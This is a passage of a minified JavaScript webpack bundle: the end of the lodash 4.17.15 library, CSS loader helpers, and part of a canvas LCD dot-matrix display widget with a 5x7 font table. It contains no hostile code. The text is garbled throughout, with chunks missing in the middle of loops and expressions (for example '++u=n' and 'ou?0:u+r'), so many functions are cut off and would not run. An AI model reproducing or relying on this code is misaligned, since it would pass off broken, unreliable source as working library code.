2:return!t.call(this,n[0],n[1]);case 3:return!t.call(this,n[0],n[1],n[2])}return!t.apply(this,n)}}aa.Cache=be;var fa=Zu((function(t,n){var r=(n=1==n.length&&da(n[0])?tr(n[0],dr(Ti())):tr(qe(n,1),dr(Ti()))).length;return ju((function(e){for(var u=-1,i=Vr(e.length,r);++u=n})),ga=uu(function(){return arguments}())?uu:function(t){return Ca(t)&&ln.call(t,"callee")&&!Tn.call(t,"callee")},da=e.isArray,ya=Dn?dr(Dn):function(t){return Ca(t)&&Qe(t)==ct};function wa(t){return null!=t&&Aa(t.length)&&!ka(t)}function ba(t){return Ca(t)&&wa(t)}var ma=Nr||Fc,xa=Nn?dr(Nn):function(t){return Ca(t)&&Qe(t)==G};function ja(t){if(!Ca(t))return!1;var n=Qe(t);return n==Z||n==V||"string"==typeof t.message&&"string"==typeof t.name&&!Ea(t)}function ka(t){if(!za(t))return!1;var n=Qe(t);return n==K||n==H||n==F||n==tt}function Sa(t){return"number"==typeof t&&t==Na(t)}function Aa(t){return"number"==typeof t&&t>-1&&t%1==0&&t<=B}function za(t){var n=typeof t;return null!=t&&("object"==n||"function"==n)}function Ca(t){return null!=t&&"object"==typeof t}var Ia=$n?dr($n):function(t){return 
Ca(t)&&Ni(t)==J};function Oa(t){return"number"==typeof t||Ca(t)&&Qe(t)==Y}function Ea(t){if(!Ca(t)||Qe(t)!=X)return!1;var n=Rn(t);if(null===n)return!0;var r=ln.call(n,"constructor")&&n.constructor;return"function"==typeof r&&r instanceof r&&sn.call(r)==_n}var Ra=Fn?dr(Fn):function(t){return Ca(t)&&Qe(t)==nt};var La=qn?dr(qn):function(t){return Ca(t)&&Ni(t)==rt};function Ba(t){return"string"==typeof t||!da(t)&&Ca(t)&&Qe(t)==et}function Ta(t){return"symbol"==typeof t||Ca(t)&&Qe(t)==ut}var Wa=Gn?dr(Gn):function(t){return Ca(t)&&Aa(t.length)&&!!zn[Qe(t)]};var Ma=wi(lu),Pa=wi((function(t,n){return t<=n}));function Ua(t){if(!t)return[];if(wa(t))return Ba(t)?Rr(t):ri(t);if(Un&&t[Un])return function(t){for(var n,r=[];!(n=t.next()).done;)r.push(n.value);return r}(t[Un]());var n=Ni(t);return(n==J?Ar:n==rt?Ir:pc)(t)}function Da(t){return t?(t=Fa(t))===L||t===-L?(t<0?-1:1)*T:t==t?t:0:0===t?t:0}function Na(t){var n=Da(t),r=n%1;return n==n?r?n-r:n:0}function $a(t){return t?Be(Na(t),0,M):0}function Fa(t){if("number"==typeof t)return t;if(Ta(t))return W;if(za(t)){var n="function"==typeof t.valueOf?t.valueOf():t;t=za(n)?n+"":n}if("string"!=typeof t)return 0===t?t:+t;t=t.replace(Bt,"");var r=Gt.test(t);return r||Zt.test(t)?En(t.slice(2),r?2:8):qt.test(t)?W:+t}function qa(t){return ei(t,ic(t))}function Ga(t){return null==t?"":Wu(t)}var Va=ii((function(t,n){if(Ji(n)||wa(n))ei(n,uc(n),t);else for(var r in n)ln.call(n,r)&&Ce(t,r,n[r])})),Za=ii((function(t,n){ei(n,ic(n),t)})),Ka=ii((function(t,n,r,e){ei(n,ic(n),t,e)})),Ha=ii((function(t,n,r,e){ei(n,uc(n),t,e)})),Ja=Ii(Le);var Ya=ju((function(t,n){t=nn(t);var r=-1,e=n.length,u=e>2?n[2]:i;for(u&&Vi(n[0],n[1],u)&&(e=1);++r1),n})),ei(t,Ei(t),r),e&&(r=Te(r,h|p|v,zi));for(var u=n.length;u--;)Pu(r,n[u]);return r}));var fc=Ii((function(t,n){return null==t?{}:function(t,n){return yu(t,n,(function(n,r){return tc(t,r)}))}(t,n)}));function sc(t,n){if(null==t)return{};var r=tr(Ei(t),(function(t){return[t]}));return 
n=Ti(n),yu(t,r,(function(t,r){return n(t,r[0])}))}var lc=ji(uc),hc=ji(ic);function pc(t){return null==t?[]:yr(t,uc(t))}var vc=fi((function(t,n,r){return n=n.toLowerCase(),t+(r?_c(n):n)}));function _c(t){return jc(Ga(t).toLowerCase())}function gc(t){return(t=Ga(t))&&t.replace(Ht,xr).replace(bn,"")}var dc=fi((function(t,n,r){return t+(r?"-":"")+n.toLowerCase()})),yc=fi((function(t,n,r){return t+(r?" ":"")+n.toLowerCase()})),wc=ci("toLowerCase");var bc=fi((function(t,n,r){return t+(r?"_":"")+n.toLowerCase()}));var mc=fi((function(t,n,r){return t+(r?" ":"")+jc(n)}));var xc=fi((function(t,n,r){return t+(r?" ":"")+n.toUpperCase()})),jc=ci("toUpperCase");function kc(t,n,r){return t=Ga(t),(n=r?i:n)===i?function(t){return kn.test(t)}(t)?function(t){return t.match(xn)||[]}(t):function(t){return t.match(Dt)||[]}(t):t.match(n)||[]}var Sc=ju((function(t,n){try{return Vn(t,i,n)}catch(t){return ja(t)?t:new Qt(t)}})),Ac=Ii((function(t,n){return Kn(n,(function(n){n=fo(n),Re(t,n,ra(t[n],t))})),t}));function zc(t){return function(){return t}}var Cc=hi(),Ic=hi(!0);function Oc(t){return t}function Ec(t){return cu("function"==typeof t?t:Te(t,h))}var Rc=ju((function(t,n){return function(r){return eu(r,t,n)}})),Lc=ju((function(t,n){return function(r){return eu(t,r,n)}}));function Bc(t,n,r){var e=uc(n),u=He(n,e);null!=r||za(n)&&(u.length||!e.length)||(r=n,n=t,t=this,u=He(n,uc(n)));var i=!(za(r)&&"chain"in r&&!r.chain),o=ka(t);return Kn(u,(function(r){var e=n[r];t[r]=e,o&&(t.prototype[r]=function(){var n=this.__chain__;if(i||n){var r=t(this.__wrapped__),u=r.__actions__=ri(this.__actions__);return u.push({func:e,args:arguments,thisArg:t}),r.__chain__=n,r}return e.apply(t,nr([this.value()],arguments))})})),t}function Tc(){}var Wc=gi(tr),Mc=gi(Jn),Pc=gi(ur);function Uc(t){return Zi(t)?hr(fo(t)):function(t){return function(n){return Je(n,t)}}(t)}var Dc=yi(),Nc=yi(!0);function $c(){return[]}function Fc(){return!1}var qc=_i((function(t,n){return t+n}),0),Gc=mi("ceil"),Vc=_i((function(t,n){return 
t/n}),1),Zc=mi("floor");var Kc,Hc=_i((function(t,n){return t*n}),1),Jc=mi("round"),Yc=_i((function(t,n){return t-n}),0);return pe.after=function(t,n){if("function"!=typeof n)throw new un(c);return t=Na(t),function(){if(--t<1)return n.apply(this,arguments)}},pe.ary=ta,pe.assign=Va,pe.assignIn=Za,pe.assignInWith=Ka,pe.assignWith=Ha,pe.at=Ja,pe.before=na,pe.bind=ra,pe.bindAll=Ac,pe.bindKey=ea,pe.castArray=function(){if(!arguments.length)return[];var t=arguments[0];return da(t)?t:[t]},pe.chain=Uo,pe.chunk=function(t,n,r){n=(r?Vi(t,n,r):n===i)?1:Gr(Na(n),0);var u=null==t?0:t.length;if(!u||n<1)return[];for(var o=0,a=0,c=e(Pr(u/n));ou?0:u+r),(e=e===i||e>u?u:Na(e))<0&&(e+=u),e=r>e?0:$a(e);r>>0)?(t=Ga(t))&&("string"==typeof n||null!=n&&!Ra(n))&&!(n=Wu(n))&&Sr(t)?Ku(Rr(t),0,r):t.split(n,r):[]},pe.spread=function(t,n){if("function"!=typeof t)throw new un(c);return n=null==n?0:Gr(Na(n),0),ju((function(r){var e=r[n],u=Ku(r,0,n);return e&&nr(u,e),Vn(t,this,u)}))},pe.tail=function(t){var n=null==t?0:t.length;return n?Ou(t,1,n):[]},pe.take=function(t,n,r){return t&&t.length?Ou(t,0,(n=r||n===i?1:Na(n))<0?0:n):[]},pe.takeRight=function(t,n,r){var e=null==t?0:t.length;return e?Ou(t,(n=e-(n=r||n===i?1:Na(n)))<0?0:n,e):[]},pe.takeRightWhile=function(t,n){return t&&t.length?Du(t,Ti(n,3),!1,!0):[]},pe.takeWhile=function(t,n){return t&&t.length?Du(t,Ti(n,3)):[]},pe.tap=function(t,n){return n(t),t},pe.throttle=function(t,n,r){var e=!0,u=!0;if("function"!=typeof t)throw new un(c);return za(r)&&(e="leading"in r?!!r.leading:e,u="trailing"in r?!!r.trailing:u),ua(t,n,{leading:e,maxWait:n,trailing:u})},pe.thru=Do,pe.toArray=Ua,pe.toPairs=lc,pe.toPairsIn=hc,pe.toPath=function(t){return da(t)?tr(t,fo):Ta(t)?[t]:ri(co(Ga(t)))},pe.toPlainObject=qa,pe.transform=function(t,n,r){var e=da(t),u=e||ma(t)||Wa(t);if(n=Ti(n,4),null==r){var i=t&&t.constructor;r=u?e?new i:[]:za(t)&&ka(i)?ve(Rn(t)):{}}return(u?Kn:Ze)(t,(function(t,e,u){return n(r,t,e,u)})),r},pe.unary=function(t){return 
ta(t,1)},pe.union=Co,pe.unionBy=Io,pe.unionWith=Oo,pe.uniq=function(t){return t&&t.length?Mu(t):[]},pe.uniqBy=function(t,n){return t&&t.length?Mu(t,Ti(n,2)):[]},pe.uniqWith=function(t,n){return n="function"==typeof n?n:i,t&&t.length?Mu(t,i,n):[]},pe.unset=function(t,n){return null==t||Pu(t,n)},pe.unzip=Eo,pe.unzipWith=Ro,pe.update=function(t,n,r){return null==t?t:Uu(t,n,Gu(r))},pe.updateWith=function(t,n,r,e){return e="function"==typeof e?e:i,null==t?t:Uu(t,n,Gu(r),e)},pe.values=pc,pe.valuesIn=function(t){return null==t?[]:yr(t,ic(t))},pe.without=Lo,pe.words=kc,pe.wrap=function(t,n){return sa(Gu(n),t)},pe.xor=Bo,pe.xorBy=To,pe.xorWith=Wo,pe.zip=Mo,pe.zipObject=function(t,n){return Fu(t||[],n||[],Ce)},pe.zipObjectDeep=function(t,n){return Fu(t||[],n||[],Au)},pe.zipWith=Po,pe.entries=lc,pe.entriesIn=hc,pe.extend=Za,pe.extendWith=Ka,Bc(pe,pe),pe.add=qc,pe.attempt=Sc,pe.camelCase=vc,pe.capitalize=_c,pe.ceil=Gc,pe.clamp=function(t,n,r){return r===i&&(r=n,n=i),r!==i&&(r=(r=Fa(r))==r?r:0),n!==i&&(n=(n=Fa(n))==n?n:0),Be(Fa(t),n,r)},pe.clone=function(t){return Te(t,v)},pe.cloneDeep=function(t){return Te(t,h|v)},pe.cloneDeepWith=function(t,n){return Te(t,h|v,n="function"==typeof n?n:i)},pe.cloneWith=function(t,n){return Te(t,v,n="function"==typeof n?n:i)},pe.conformsTo=function(t,n){return null==n||We(t,n,uc(n))},pe.deburr=gc,pe.defaultTo=function(t,n){return null==t||t!=t?n:t},pe.divide=Vc,pe.endsWith=function(t,n,r){t=Ga(t),n=Wu(n);var e=t.length,u=r=r===i?e:Be(Na(r),0,e);return(r-=n.length)>=0&&t.slice(r,u)==n},pe.eq=pa,pe.escape=function(t){return(t=Ga(t))&&St.test(t)?t.replace(jt,jr):t},pe.escapeRegExp=function(t){return(t=Ga(t))&&Lt.test(t)?t.replace(Rt,"\\$&"):t},pe.every=function(t,n,r){var e=da(t)?Jn:Ne;return r&&Vi(t,n,r)&&(n=i),e(t,Ti(n,3))},pe.find=Fo,pe.findIndex=_o,pe.findKey=function(t,n){return or(t,Ti(n,3),Ze)},pe.findLast=qo,pe.findLastIndex=go,pe.findLastKey=function(t,n){return 
or(t,Ti(n,3),Ke)},pe.floor=Zc,pe.forEach=Go,pe.forEachRight=Vo,pe.forIn=function(t,n){return null==t?t:Ge(t,Ti(n,3),ic)},pe.forInRight=function(t,n){return null==t?t:Ve(t,Ti(n,3),ic)},pe.forOwn=function(t,n){return t&&Ze(t,Ti(n,3))},pe.forOwnRight=function(t,n){return t&&Ke(t,Ti(n,3))},pe.get=Xa,pe.gt=va,pe.gte=_a,pe.has=function(t,n){return null!=t&&$i(t,n,tu)},pe.hasIn=tc,pe.head=wo,pe.identity=Oc,pe.includes=function(t,n,r,e){t=wa(t)?t:pc(t),r=r&&!e?Na(r):0;var u=t.length;return r<0&&(r=Gr(u+r,0)),Ba(t)?r<=u&&t.indexOf(n,r)>-1:!!u&&cr(t,n,r)>-1},pe.indexOf=function(t,n,r){var e=null==t?0:t.length;if(!e)return-1;var u=null==r?0:Na(r);return u<0&&(u=Gr(e+u,0)),cr(t,n,u)},pe.inRange=function(t,n,r){return n=Da(n),r===i?(r=n,n=0):r=Da(r),function(t,n,r){return t>=Vr(n,r)&&t=-B&&t<=B},pe.isSet=La,pe.isString=Ba,pe.isSymbol=Ta,pe.isTypedArray=Wa,pe.isUndefined=function(t){return t===i},pe.isWeakMap=function(t){return Ca(t)&&Ni(t)==ot},pe.isWeakSet=function(t){return Ca(t)&&Qe(t)==at},pe.join=function(t,n){return null==t?"":Fr.call(t,n)},pe.kebabCase=dc,pe.last=jo,pe.lastIndexOf=function(t,n,r){var e=null==t?0:t.length;if(!e)return-1;var u=e;return r!==i&&(u=(u=Na(r))<0?Gr(e+u,0):Vr(u,e-1)),n==n?function(t,n,r){for(var e=r+1;e--;)if(t[e]===n)return e;return e}(t,n,u):ar(t,sr,u,!0)},pe.lowerCase=yc,pe.lowerFirst=wc,pe.lt=Ma,pe.lte=Pa,pe.max=function(t){return t&&t.length?$e(t,Oc,Xe):i},pe.maxBy=function(t,n){return t&&t.length?$e(t,Ti(n,2),Xe):i},pe.mean=function(t){return lr(t,Oc)},pe.meanBy=function(t,n){return lr(t,Ti(n,2))},pe.min=function(t){return t&&t.length?$e(t,Oc,lu):i},pe.minBy=function(t,n){return t&&t.length?$e(t,Ti(n,2),lu):i},pe.stubArray=$c,pe.stubFalse=Fc,pe.stubObject=function(){return{}},pe.stubString=function(){return""},pe.stubTrue=function(){return!0},pe.multiply=Hc,pe.nth=function(t,n){return t&&t.length?gu(t,Na(n)):i},pe.noConflict=function(){return Bn._===this&&(Bn._=gn),this},pe.noop=Tc,pe.now=Xo,pe.pad=function(t,n,r){t=Ga(t);var 
e=(n=Na(n))?Er(t):0;if(!n||e>=n)return t;var u=(n-e)/2;return di(Ur(u),r)+t+di(Pr(u),r)},pe.padEnd=function(t,n,r){t=Ga(t);var e=(n=Na(n))?Er(t):0;return n&&en){var e=t;t=n,n=e}if(r||t%1||n%1){var u=Hr();return Vr(t+u*(n-t+On("1e-"+((u+"").length-1))),n)}return mu(t,n)},pe.reduce=function(t,n,r){var e=da(t)?rr:vr,u=arguments.length<3;return e(t,Ti(n,4),r,u,Ue)},pe.reduceRight=function(t,n,r){var e=da(t)?er:vr,u=arguments.length<3;return e(t,Ti(n,4),r,u,De)},pe.repeat=function(t,n,r){return n=(r?Vi(t,n,r):n===i)?1:Na(n),xu(Ga(t),n)},pe.replace=function(){var t=arguments,n=Ga(t[0]);return t.length<3?n:n.replace(t[1],t[2])},pe.result=function(t,n,r){var e=-1,u=(n=Vu(n,t)).length;for(u||(u=1,t=i);++eB)return[];var r=M,e=Vr(t,M);n=Ti(n),t-=M;for(var u=gr(e,n);++r=o)return t;var c=r-Er(e);if(c<1)return e;var f=a?Ku(a,0,c).join(""):t.slice(0,c);if(u===i)return f+e;if(a&&(c+=f.length-c),Ra(u)){if(t.slice(c).search(u)){var s,l=f;for(u.global||(u=rn(u.source,Ga(Ft.exec(u))+"g")),u.lastIndex=0;s=u.exec(l);)var h=s.index;f=f.slice(0,h===i?c:h)}}else if(t.indexOf(Wu(u),c)!=c){var p=f.lastIndexOf(u);p>-1&&(f=f.slice(0,p))}return f+e},pe.unescape=function(t){return(t=Ga(t))&&kt.test(t)?t.replace(xt,Lr):t},pe.uniqueId=function(t){var n=++hn;return Ga(t)+n},pe.upperCase=xc,pe.upperFirst=jc,pe.each=Go,pe.eachRight=Vo,pe.first=wo,Bc(pe,(Kc={},Ze(pe,(function(t,n){ln.call(pe.prototype,n)||(Kc[n]=t)})),Kc),{chain:!1}),pe.VERSION="4.17.15",Kn(["bind","bindKey","curry","curryRight","partial","partialRight"],(function(t){pe[t].placeholder=pe})),Kn(["drop","take"],(function(t,n){de.prototype[t]=function(r){r=r===i?1:Gr(Na(r),0);var e=this.__filtered__&&!n?new de(this):this.clone();return e.__filtered__?e.__takeCount__=Vr(r,e.__takeCount__):e.__views__.push({size:Vr(r,M),type:t+(e.__dir__<0?"Right":"")}),e},de.prototype[t+"Right"]=function(n){return this.reverse()[t](n).reverse()}})),Kn(["filter","map","takeWhile"],(function(t,n){var r=n+1,e=r==E||3==r;de.prototype[t]=function(t){var 
n=this.clone();return n.__iteratees__.push({iteratee:Ti(t,3),type:r}),n.__filtered__=n.__filtered__||e,n}})),Kn(["head","last"],(function(t,n){var r="take"+(n?"Right":"");de.prototype[t]=function(){return this[r](1).value()[0]}})),Kn(["initial","tail"],(function(t,n){var r="drop"+(n?"":"Right");de.prototype[t]=function(){return this.__filtered__?new de(this):this[r](1)}})),de.prototype.compact=function(){return this.filter(Oc)},de.prototype.find=function(t){return this.filter(t).head()},de.prototype.findLast=function(t){return this.reverse().find(t)},de.prototype.invokeMap=ju((function(t,n){return"function"==typeof t?new de(this):this.map((function(r){return eu(r,t,n)}))})),de.prototype.reject=function(t){return this.filter(ca(Ti(t)))},de.prototype.slice=function(t,n){t=Na(t);var r=this;return r.__filtered__&&(t>0||n<0)?new de(r):(t<0?r=r.takeRight(-t):t&&(r=r.drop(t)),n!==i&&(r=(n=Na(n))<0?r.dropRight(-n):r.take(n-t)),r)},de.prototype.takeRightWhile=function(t){return this.reverse().takeWhile(t).reverse()},de.prototype.toArray=function(){return this.take(M)},Ze(de.prototype,(function(t,n){var r=/^(?:filter|find|map|reject)|While$/.test(n),e=/^(?:head|last)$/.test(n),u=pe[e?"take"+("last"==n?"Right":""):n],o=e||/^find/.test(n);u&&(pe.prototype[n]=function(){var n=this.__wrapped__,a=e?[1]:arguments,c=n instanceof de,f=a[0],s=c||da(n),l=function(t){var n=u.apply(pe,nr([t],a));return e&&h?n[0]:n};s&&r&&"function"==typeof f&&1!=f.length&&(c=s=!1);var h=this.__chain__,p=!!this.__actions__.length,v=o&&!h,_=c&&!p;if(!o&&s){n=_?n:new de(this);var g=t.apply(n,a);return g.__actions__.push({func:Do,args:[l],thisArg:i}),new ge(g,h)}return v&&_?t.apply(this,a):(g=this.thru(l),v?e?g.value()[0]:g.value():g)})})),Kn(["pop","push","shift","sort","splice","unshift"],(function(t){var n=on[t],r=/^(?:push|sort|unshift)$/.test(t)?"tap":"thru",e=/^(?:pop|shift)$/.test(t);pe.prototype[t]=function(){var t=arguments;if(e&&!this.__chain__){var u=this.value();return 
n.apply(da(u)?u:[],t)}return this[r]((function(r){return n.apply(da(r)?r:[],t)}))}})),Ze(de.prototype,(function(t,n){var r=pe[n];if(r){var e=r.name+"";ln.call(ue,e)||(ue[e]=[]),ue[e].push({name:n,func:r})}})),ue[pi(i,y).name]=[{name:"wrapper",func:i}],de.prototype.clone=function(){var t=new de(this.__wrapped__);return t.__actions__=ri(this.__actions__),t.__dir__=this.__dir__,t.__filtered__=this.__filtered__,t.__iteratees__=ri(this.__iteratees__),t.__takeCount__=this.__takeCount__,t.__views__=ri(this.__views__),t},de.prototype.reverse=function(){if(this.__filtered__){var t=new de(this);t.__dir__=-1,t.__filtered__=!0}else(t=this.clone()).__dir__*=-1;return t},de.prototype.value=function(){var t=this.__wrapped__.value(),n=this.__dir__,r=da(t),e=n<0,u=r?t.length:0,i=function(t,n,r){var e=-1,u=r.length;for(;++e=this.__values__.length;return{done:t,value:t?i:this.__values__[this.__index__++]}},pe.prototype.plant=function(t){for(var n,r=this;r instanceof _e;){var e=lo(r);e.__index__=0,e.__values__=i,n?u.__wrapped__=e:n=e;var u=e;r=r.__wrapped__}return u.__wrapped__=t,n},pe.prototype.reverse=function(){var t=this.__wrapped__;if(t instanceof de){var n=t;return this.__actions__.length&&(n=new de(this)),(n=n.reverse()).__actions__.push({func:Do,args:[zo],thisArg:i}),new ge(n,this.__chain__)}return this.thru(zo)},pe.prototype.toJSON=pe.prototype.valueOf=pe.prototype.value=function(){return Nu(this.__wrapped__,this.__actions__)},pe.prototype.first=pe.prototype.head,Un&&(pe.prototype[Un]=function(){return this}),pe}();Bn._=Br,(u=function(){return Br}.call(n,r,n,e))===i||(e.exports=u)}).call(this)}).call(this,r(5),r(6)(t))},function(t,n,r){var e=r(2);"string"==typeof e&&(e=[[t.i,e,""]]);var u={insert:"head",singleton:!1};r(4)(e,u);e.locals&&(t.exports=e.locals)},function(t,n,r){(t.exports=r(3)(!1)).push([t.i,".lcd-container{padding:20px 30px;background-color:#c7e736;color:red;display:inline-block;font-size:0;border-color:#000;border-style:solid;border-width:10px 
14px;box-shadow:inset 0 0 30px rgba(0,0,0,.3),0 10px 15px -5px rgba(0,0,0,.5);border-radius:3px;overflow:hidden}",""])},function(t,n,r){"use strict";t.exports=function(t){var n=[];return n.toString=function(){return this.map((function(n){var r=function(t,n){var r=t[1]||"",e=t[3];if(!e)return r;if(n&&"function"==typeof btoa){var u=(o=e,a=btoa(unescape(encodeURIComponent(JSON.stringify(o)))),c="sourceMappingURL=data:application/json;charset=utf-8;base64,".concat(a),"/*# ".concat(c," */")),i=e.sources.map((function(t){return"/*# sourceURL=".concat(e.sourceRoot).concat(t," */")}));return[r].concat(i).concat([u]).join("\n")}var o,a,c;return[r].join("\n")}(n,t);return n[2]?"@media ".concat(n[2],"{").concat(r,"}"):r})).join("")},n.i=function(t,r){"string"==typeof t&&(t=[[null,t,""]]);for(var e={},u=0;u{this.isVisible?this.render(!1):this.render(!0)},300))}}const i={20:{character:"Space",rows:[0,0,0,0,0,0,0]},21:{character:"!",rows:[4,4,4,4,4,0,4]},22:{character:'"',rows:[9,9,18,0,0,0,0]},23:{character:"#",rows:[10,10,31,10,31,10,10]},24:{character:"$",rows:[4,15,20,14,5,30,4]},25:{character:"%",rows:[25,25,2,4,8,19,19]},26:{character:"&",rows:[4,10,10,10,21,18,13]},27:{character:"'",rows:[4,4,8,0,0,0,0]},28:{character:"(",rows:[2,4,8,8,8,4,2]},29:{character:")",rows:[8,4,2,2,2,4,8]},"2a":{character:"*",rows:[4,21,14,31,14,21,4]},"2b":{character:"+",rows:[0,4,4,31,4,4,0]},"2c":{character:",",rows:[0,0,0,0,4,4,8]},"2d":{character:"-",rows:[0,0,0,31,0,0,0]},"2e":{character:".",rows:[0,0,0,0,0,12,12]},"2f":{character:"/",rows:[1,1,2,4,8,16,16]},30:{character:"0",rows:[14,17,19,21,25,17,14]},31:{character:"1",rows:[4,12,4,4,4,4,14]},32:{character:"2",rows:[14,17,1,2,4,8,31]},33:{character:"3",rows:[14,17,1,6,1,17,14]},34:{character:"4",rows:[2,6,10,18,31,2,2]},35:{character:"5",rows:[31,16,30,1,1,17,14]},36:{character:"6",rows:[6,8,16,30,17,17,14]},37:{character:"7",rows:[31,1,2,4,8,8,8]},38:{character:"8",rows:[14,17,17,14,17,17,14]},39:{character:"9",rows:[14,17,17,15,1,2,12]
},"3a":{character:":",rows:[0,12,12,0,12,12,0]},"3b":{character:";",rows:[0,12,12,0,12,4,8]},"3c":{character:"<",rows:[2,4,8,16,8,4,2]},"3d":{character:"=",rows:[0,0,31,0,31,0,0]},"3e":{character:">",rows:[8,4,2,1,2,4,8]},"3f":{character:"?",rows:[14,17,1,2,4,0,4]},40:{character:"@",rows:[14,17,23,21,23,16,15]},41:{character:"A",rows:[4,10,17,17,31,17,17]},42:{character:"B",rows:[30,17,17,30,17,17,30]},43:{character:"C",rows:[14,17,16,16,16,17,14]},44:{character:"D",rows:[30,9,9,9,9,9,30]},45:{character:"E",rows:[31,16,16,28,16,16,31]},46:{character:"F",rows:[31,16,16,31,16,16,16]},47:{character:"G",rows:[14,17,16,16,19,17,15]},48:{character:"H",rows:[17,17,17,31,17,17,17]},49:{character:"I",rows:[14,4,4,4,4,4,14]},"4a":{character:"J",rows:[31,2,2,2,2,18,12]},"4b":{character:"K",rows:[17,18,20,24,20,18,17]},"4c":{character:"L",rows:[16,16,16,16,16,16,31]},"4d":{character:"M",rows:[17,27,21,17,17,17,17]},"4e":{character:"N",rows:[17,17,25,21,19,17,17]},"4f":{character:"O",rows:[14,17,17,17,17,17,14]},50:{character:"P",rows:[30,17,17,30,16,16,16]},51:{character:"Q",rows:[14,17,17,17,21,18,13]},52:{character:"R",rows:[30,17,17,30,20,18,17]},53:{character:"S",rows:[14,17,16,14,1,17,14]},54:{character:"T",rows:[31,4,4,4,4,4,4]},55:{character:"U",rows:[17,17,17,17,17,17,14]},56:{character:"V",rows:[17,17,17,17,17,10,4]},57:{character:"W",rows:[17,17,17,21,21,27,17]},58:{character:"X",rows:[17,17,10,4,10,17,17]},59:{character:"Y",rows:[17,17,10,4,4,4,4]},"5a":{character:"Z",rows:[31,1,2,4,8,16,31]},"5b":{character:"[",rows:[14,8,8,8,8,8,14]},"5c":{character:"\\",rows:[16,16,8,4,2,1,1]},"5d":{character:"]",rows:[14,2,2,2,2,2,14]},"5e":{character:"^",rows:[4,10,17,0,0,0,0]},"5f":{character:"_",rows:[0,0,0,0,0,0,31]},60:{character:"`",rows:[4,4,2,0,0,0,0]},61:{character:"a",rows:[0,14,1,13,19,19,13]},62:{character:"b",rows:[16,16,16,28,18,18,28]},63:{character:"c",rows:[0,0,0,14,16,16,14]},64:{character:"d",rows:[1,1,1,7,9,9,7]},65:{character:"e",rows:[0,0,14,17,31,16,15]},66
:{character:"f",rows:[6,9,8,28,8,8,8]},67:{character:"g",rows:[14,17,19,13,1,1,14]},68:{character:"h",rows:[16,16,16,22,25,17,17]},69:{character:"i",rows:[0,4,0,12,4,4,14]},"6a":{character:"j",rows:[2,0,6,2,2,18,12]},"6b":{character:"k",rows:[16,16,18,20,24,20,18]},"6c":{character:"l",rows:[12,4,4,4,4,4,4]},"6d":{character:"m",rows:[0,0,10,21,21,17,17]},"6e":{character:"n",rows:[0,0,22,25,17,17,17]},"6f":{character:"o",rows:[0,0,14,17,17,17,14]},70:{character:"p",rows:[0,28,18,18,28,16,16]},71:{character:"q",rows:[0,7,9,9,7,1,1]},72:{character:"r",rows:[0,0,22,25,16,16,16]},73:{character:"s",rows:[0,0,15,16,14,1,30]},74:{character:"t",rows:[8,8,28,8,8,9,6]},75:{character:"u",rows:[0,0,17,17,17,19,13]},76:{character:"v",rows:[0,0,17,17,17,10,4]},77:{character:"w",rows:[0,0,17,17,21,21,10]},78:{character:"x",rows:[0,0,17,10,4,10,17]},79:{character:"y",rows:[0,17,17,15,1,17,14]},"7a":{character:"z",rows:[0,0,31,2,4,8,31]},"7b":{character:"{",rows:[6,8,8,16,8,8,6]},"7c":{character:"|",rows:[4,4,4,0,4,4,4]},"7d":{character:"}",rows:[12,2,2,1,2,2,12]},"7e":{character:"~",rows:[8,21,2,0,0,0,0]},"7f":{character:"DEL",rows:[31,31,31,31,31,31,31]}},o=(t,n)=>{return(Array(n).fill("0").join(0)+t).slice(-n)};class a{constructor({canvas:t,index:n,rows:r,columns:e,pixelSize:i,pixelColor:o}={}){this.canvas=t,this.index=n,this.rows=r,this.columns=e,this.pixelSize=i,this.pixelColor=o,this.setPosition(),this.pixels=[...Array(a.getPixelCount())].map((t,n)=>new u({canvas:this.canvas,index:n,size:this.pixelSize,color:this.pixelColor,offset:{x:this.x,y:this.y}})),this.render()}static getPixels(){return{row:5,column:8}}static getPixelCount(){const{row:t,column:n}=a.getPixels();return t*n}static getGutterSize(t){return t}static 
getSize(t){const{row:n,column:r}=a.getPixels(),e=u.getGutterSize(t);return{width:t*n+e*(n-1),height:t*r+e*(r-1)}}setPosition(){this.gutter=a.getGutterSize(this.pixelSize);const{width:t,height:n}=a.getSize(this.pixelSize),r=this.index%this.columns,e=Math.floor(this.index/this.columns);this.x=r*t+r*this.gutter,this.y=e*n+e*this.gutter}render(){this.pixels.forEach(t=>{t.render(!1)})}writeCharacter({charCode:t}){this.clearCharacter();const n=Object(e.isNumber)(t)?Number(t).toString(16):t,{rows:r}=i[n],u=r.map(t=>{const n=Number(t).toString(2);return o(n,5)}).join("").split("");this.pixels.forEach(t=>{const n=u[t.index];t.render("1"===n)})}clearCharacter(){this.pixels.forEach(t=>{t.render(!1)})}toggleCursorBlink(t=!1){const{row:n}=a.getPixels();this.pixels.slice(-n).forEach(n=>{n.blink(t)})}}class c{constructor({elem:t,rows:n,columns:r,pixelSize:e,pixelColor:u}){this.rows=n,this.columns=r,this.pixelSize=e,this.pixelColor=u,this.elem=t,this.render(),this.blocks=[...Array(this.rows*this.columns)].map((t,n)=>new a({canvas:this.canvas,index:n,rows:this.rows,columns:this.columns,pixelSize:e,pixelColor:u})),this.activeBlockIndex=null}static getSize(t,n,r){const e=a.getSize(r),u=a.getGutterSize(r);return{width:e.width*n+u*(n-1),height:e.height*t+u*(t-1)}}render(){this.canvas=document.createElement("canvas");const{width:t,height:n}=c.getSize(this.rows,this.columns,this.pixelSize);this.canvas.setAttribute("width",t),this.canvas.setAttribute("height",n),this.elem.innerHTML="",this.elem.appendChild(this.canvas)}writeCharacter({charCode:t,blockIndex:n=0}={}){const r=Object(e.find)(this.blocks,{index:n});r&&r.writeCharacter({charCode:t})}writeString({string:t="",offset:n=0}={}){t.split("").forEach((t,r)=>{const e=t.charCodeAt(0);this.writeCharacter({charCode:e,blockIndex:r+n})})}clearCharacter({blockIndex:t=0}={}){const 
